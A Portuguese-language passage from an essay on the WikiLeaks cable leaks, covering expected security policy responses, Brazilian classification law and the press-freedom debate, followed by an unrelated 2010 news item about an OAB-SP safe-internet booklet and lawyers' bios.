Um dos reflexos da divulgação destes documentos é que os diplomatas provavelmente vão procurar evitar oferecer informações muitos detalhadas sobre os países em que estiverem desempenhando suas atribuições, com o receio que seus relatórios sejam divulgados.
Além disso, os diplomatas serão vistos pelas pessoas dos países em que estiverem instalados basicamente como meros agentes do serviço de inteligência dos países, de forma que será mantido certo distanciamento deles.
Os órgãos do governo que lidam com informações confidenciais vão passar a dar mais valor na segurança corporativa, que representa a adoção de medidas visando proteger os recursos humanos, a documentação, o material, os recursos da informática, as comunicações e as áreas e instalações das referidas instituições.
Neste sentido é possível prever uma maior preocupação com a limitação do acesso as informações sigilosas, de forma que terão acesso a elas apenas as pessoas que tiverem real necessidade de ter contato com as mesmas (princípio de compartimentação do conhecimento – conhecer apenas o que for necessário conhecer).

Outra medida que deverá ser aplicada diz respeito a impossibilitar o acesso às informações confidenciais no mesmo computador utilizado para acessar a internet, além do bloqueio de gravadores de CDs e DVDs e drivers USB para evitar a utilização de dispositivos portáteis de armazenamento, como por exemplo, pen drivers, etc.
Outra conseqüência do WikiLeaks é que fomentou a discussão sobre os limites da imprensa na divulgação de notícias que possam colocar a segurança do país em risco e até que ponto o cidadão tem o direito de ter acesso a informações confidenciais salvaguardadas pelo governo.
Alguns têm alegado que o direito à informação em um regime democrático é uma garantia de todas as pessoas e que os órgãos de comunicação devem fazer chegar ao público todo tipo de notícia, inclusive aquelas envolvendo informações sensíveis que possam ameaçar a soberania, a integridade territorial do país e as relações com outros países.
Outros possuem o entendimento que a liberdade de imprensa deve ser relativizada, que os meios de comunicação devem trabalhar com responsabilidade, de forma que não divulguem informações capazes de proporcionar prejuízos ao Estado. Segundo o entendimento destas pessoas a segurança nacional deveria prevalecer sobre os interesses de cada cidadão ter acesso a este tipo de informação.


VI – LEGISLAÇÃO BRASILEIRA
No Brasil existem normas que tratam dos documentos sigilosos e não permitem que os mesmos sejam indevidamente divulgados.
O Decreto Nº 4.553/02 prevê a salvaguarda de dados, informações, documentos e materiais sigilosos de interesse da segurança da sociedade e do Estado, no âmbito da Administração Pública Federal.
Este Decreto considera sigiloso o dado ou informação cujo conhecimento irrestrito ou divulgação possa acarretar risco à segurança da sociedade e do Estado e também aqueles necessários ao resguardo da inviolabilidade da intimidade da vida privada, da honra e da imagem das pessoas (art. 2º do Decreto).
Os dados e informações sigilosos, de acordo com o seu artigo 5º, são classificados em ultra-secretos, secretos, confidenciais e reservados, em razão do seu teor ou dos seus elementos intrínsecos, sendo denominados:
- ultra-secretos: dados ou informações referentes à soberania e à integridade territorial nacionais, a planos e operações militares, às relações internacionais do País, a projetos de pesquisa e desenvolvimento científico e tecnológico de interesse da defesa nacional e a programas econômicos, cujo conhecimento não-autorizado possa acarretar dano excepcionalmente grave à segurança da sociedade e do Estado;
- secretos: dados ou informações referentes a sistemas, instalações, programas, projetos, planos ou operações de interesse da defesa nacional, a assuntos diplomáticos e de inteligência e a planos ou detalhes, programas ou instalações estratégicos, cujo conhecimento não-autorizado possa acarretar dano grave à segurança da sociedade e do Estado;
- confidenciais: dados ou informações que, no interesse do Poder Executivo e das partes, devam ser de conhecimento restrito e cuja revelação não-autorizada possa frustrar seus objetivos ou acarretar dano à segurança da sociedade e do Estado;
- reservados: dados ou informações cuja revelação não-autorizada possa comprometer planos, operações ou objetivos neles previstos ou referidos.
Cabe destacar que a classificação destes documentos possui um prazo de duração contado a partir da data de sua produção. Conforme o artigo 7º os documentos ultra-secretos têm um prazo máximo de trinta anos, os secretos possuem um prazo máximo de vinte anos, os confidenciais têm um prazo máximo de dez anos e os reservados um prazo máximo de cinco anos.
O artigo 37, 1º prevê que “todo aquele que tiver conhecimento, nos termos deste Decreto, de assuntos sigilosos fica sujeito às sanções administrativas, civis e penais decorrentes da eventual divulgação dos mesmos” e o artigo 65 que “toda e qualquer pessoa que tome conhecimento de documento sigiloso, nos termos deste Decreto fica, automaticamente, responsável pela preservação do seu sigilo”.
O artigo 325 do Código Penal prevê que a divulgação de informações sigilosas pode ser enquadrada no crime de violação do sigilo funcional, que possui uma pena de 2 a 6 anos de reclusão e multa.


VII – CONCLUSÃO
O Estado tem a finalidade de promover o bem estar da população e agir sempre na mais restrita legalidade. A partir do momento que seus agentes ultrapassam este limite, a imprensa não apenas tem o direito, mas também o dever de agir, de denunciar e difundir em todos os meios disponíveis.
É uma constatação geral a necessidade dos órgãos de imprensa realizarem suas atividades na mais absoluta liberdade, imparcialidade e transparência, de forma que veiculem notícias independente dos interesses particulares que possam atingir.
Estas características são salutares para a democracia, contudo não é aceitável que uma atuação irresponsável de um órgão de comunicação, coloque em risco a vida das pessoas, a soberania do país ou a segurança nacional, pois devem ser salvaguardadas a qualquer custo.
Desta forma consideramos necessário que a imprensa respeite os prazos de não divulgação de informações classificadas como sigilosas, conforme dispõe o Decreto Nº 4.553/02, desde que as mesmas tenham relação com ações “lícitas” praticadas pelo Estado como medida adequada para a manutenção da segurança do Estado e de cada um dos cidadãos.
Neste contexto a divulgação de documentos sigilosos do governo, como a organização WikiLeaks tem promovido deve ser realizada apenas se respeitar os prazos previstos nas normas dos países envolvidos ou nos casos em que o Estado violar a Lei, sendo que nestes casos deve ser feita uma ampla divulgação para que não ocorram novamente e que estes casos sejam devidamente apurados.


VIII – BIBLIOGRAFIA
ANDREI NETTO. Vazamento de segredos no WikiLeaks obriga países a repensar a diplomacia. O Estado de S.Paulo.  <http://www.estadao.com.br/estadaodehoje/20101205/not_imp649639,0.php>. Acesso em: 05 dez. 2010.

EÇA, Luiz. Wikleaks Desmascara a Guerra de Obama. Correio da Cidadania. Disponível em: <http://www.aepet.org.br/site/noticias/pagina/181/WIK-LEAKS-DESMASCARA-A-GUERRA-DE-OBAMA>. Acesso em: 05 dez. 2010.

JORGE, Higor Vinicius Nogueira Jorge. et al. Considerações sobre a necessidade de integração entre os setores de inteligência policial no Brasil. In: Integração Nacional dos Setores de Inteligência Policial. 35 ed. São Paulo: ADPESP, 2007, p. 07-32.

MURTA, Andre. EUA expandiram espionagem direta, revelam telegramas vazados pelo WikiLeaks. Disponível em: <http://www1.folha.uol.com.br/mundo/841108-eua-expandiram-espionagem-direta-revelam-telegramas-vazados-pelo-wikileaks.shtml>. Acesso em: 06 dez. 2010.

NUNES, Letícia; THURLER, Larriza. Novo Vazamento revela segredos diplomáticos. Disponível em: < http://www.observatoriodaimprensa.com.br/artigos.asp?cod=618MON001>. Acesso em: 04 dez. 2010.

WikiLeaks. Disponível em: <http://213.251.145.96>. Acesso em: 05 dez. 2010.

WikiLeaks e Islândia querem criar o paraíso da informação. Terra Tecnologia. Disponível em: <http://tecnologia.terra.com.br/noticias/0,,OI4631443-EI12884,00-WikiLeaks+e+Islandia+querem+criar+o+paraiso+da+informacao.html>. Acesso em: 05 dez. 2010.


HIGOR VINICIUS NOGUEIRA JORGE é Delegado de Polícia, professor de análise de inteligência da Academia da Polícia Civil, professor universitário e tem feito palestras sobre segurança da informação, crimes cibernéticos, TI e drogas. Site: www.higorjorge.com.br Twitter: http://twitter.com/higorjorge

Advogados do Opice Blum coordenam Cartilha Internet Segura, da OAB-SP e Mackenzie

Advogados do Opice Blum coordenam Cartilha Internet Segura, da OAB-SP e Mackenzie

Os textos da cartilha buscam a conscientização da família quanto ao uso seguro dos meios eletrônicos
25 de outubro de 2010, / Internet

Os advogados Juliana Abrusio e Renato Opice Blum, do escritório Opice Blum Advogados Associados, juntamente com o presidente da Comissão de Crimes de Alta Tecnologia da OAB-SP, Coriolano de Almeida Camargo, lançaram a cartilha “Recomendações e boas práticas para o Uso Seguro da Internet para Toda a Família”, da OAB/SP e da Universidade Mackenzie. Com o patrocínio da Microsoft e Telefonica, e apoio do Jornal Jovem, InfoSec Council e LEEME (Laboratório de Estudos em Ética nos Meios Eletrônicos), os textos da cartilha buscam a conscientização da família quanto ao uso seguro dos meios eletrônicos. Professores, jovens e pais poderão beneficiar-se das informações, disponível para download gratuito no site da OAB.

Opice Blum Advogados

Possui sólida experiência nas principais áreas do Direito, especialmente em tecnologia, Direito Eletrônico, informática, telecomunicações e suas vertentes. O escritório é pioneiro nessas questões, onde atua, também, em mediações, arbitragens, sustentações orais em Tribunais, crimes eletrônicos, redes sociais, vazamento de informações e concorrência desleal, segurança do comércio eletrônico, privacidade, propriedade intelectual, software, contratos eletrônicos, entre outros temas relativos ao Direito Eletrônico.

Renato Opice Blum

Advogado e economista; Coordenador do curso de MBA em Direito Eletrônico da Escola Paulista de Direito; Professor convidado do Curso “Electronic Law” da Florida Christian University, Fundação Getúlio Vargas, PUC, FIAP, Rede de Ensino Luiz Flávio Gomes (LFG), Universidade Federal do Rio de Janeiro, FMU e outras; Professor palestrante/congressista da Universidade Mackenzie, FMU; Professor colaborador da parceria ITA-Stefanini; Árbitro da FGV, da Câmara de Mediação e Arbitragem de São Paulo (FIESP); Presidente do Conselho Superior de Tecnologia da Informação da Federação do Comércio/SP e do Comitê de Direito da Tecnologia da AMCHAM; Membro da Comissão de Direito da Sociedade da Informação – OAB/SP; Vice-Presidente do Comitê sobre Crimes Eletrônicos – OAB/SP; Coordenador e co-autor do livro “Manual de Direito Eletrônico e Internet”; Sócio do Opice Blum Advogados; Currículo Plataforma Lattes.

Juliana Abrusio

Sócia do Opice Blum Advogados, onde é especialista em Direito Eletrônico consultivo e contencioso, Segurança da Informação e Gestão de Riscos, Fraudes nos meios eletrônicos, Direitos autorais e propriedade industrial e Contratos eletrônicos. É mestre pela Universitá degli Studi di Roma Tor Vergata USRV (2006), com título revalidado pela Universidade de São Paulo, participou do Projeto da União Européia para redação de Código único na matéria de contratos para a América Latina (2004-2006). Formada em Direito desde 2001 pela Universidade Presbiteriana Mackenzie. Cursou a Universidade de Valladolid, Espanha, em 2000, e a Fanshawe College, Ontário, Canadá, nas matérias Corporate Law e Business Law, em 1999.